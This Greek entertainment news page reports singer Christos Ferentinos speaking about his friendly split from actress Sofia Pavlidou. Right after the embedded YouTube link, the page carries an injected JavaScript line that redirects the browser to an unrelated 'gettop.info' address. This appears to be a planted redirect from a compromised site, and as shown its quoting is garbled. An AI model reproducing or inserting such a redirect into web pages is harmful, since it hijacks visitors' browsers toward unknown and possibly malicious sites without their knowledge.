Χρήστος Φερεντίνος για τον χωρισμό του: Είμαστε σε πολύ καλή φάση, αγαπημένοι (BINTEO)

0
39

 

«Είμαστε σε πολύ καλή φάση. Ξεκάθαροι. Αγαπημένοι. Όλα πολύ καλά» είπε ο Χρήστος Φερεντίνος καλεσμένος στην εκπομπή «Βράδυ» για τον χωρισμό του από την ηθοποιό Σοφία Παυλίδου.

Και πρόσθεσε: «Αισθάνομαι όπως πας στο στρατό την πρώτη μέρα Να το δούμε από τη θετική πλευρά. Όλα καλά, είμαστε σε πολύ καλή φάση γενικότερα, αγαπημένοι και ξεκάθαροι. Αν δεν βιώσεις τη δυσκολία της κατάστασης, τότε δεν φτάνεις μετά στο καλό αποτέλεσμα. Πολλές φορές η συναισθηματική δυσκολία έρχεται στο φινάλε μιας κατάστασης, πριν ανακοινωθεί, πριν επισημοποιηθεί, πριν παρθεί η απόφαση καν, τότε ο καθένας με έναν διαφορετικό τρόπο βιώνει το “πένθος” του. Αν αυτά ταυτιστούν, συγχρονιστούν και οι διαθέσεις δύο ανθρώπων που είναι χρόνια μαζί, τότε όλα τελειώνει αγαπημένα. Αυτό συνέβη και με εμάς».

Όσο για το πώς θα αισθανθεί αν δεις την πρώην γυναίκα του με έναν άλλο σύντροφο, σημείωσε: «Αν είναι αληθινό και δεν είναι ψέματα! Γιατί ακούγονται ψέματα, σαν αυτά που ακούσαμε προχτές. Αν δεν είναι ψέματα, είμαι έτοιμος, αφού πήραμε την απόφαση! Γιατί όλα είναι μέσα στο παιχνίδι».

https://www.youtube.com/watch?v=c6xrgU0Qi7g setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here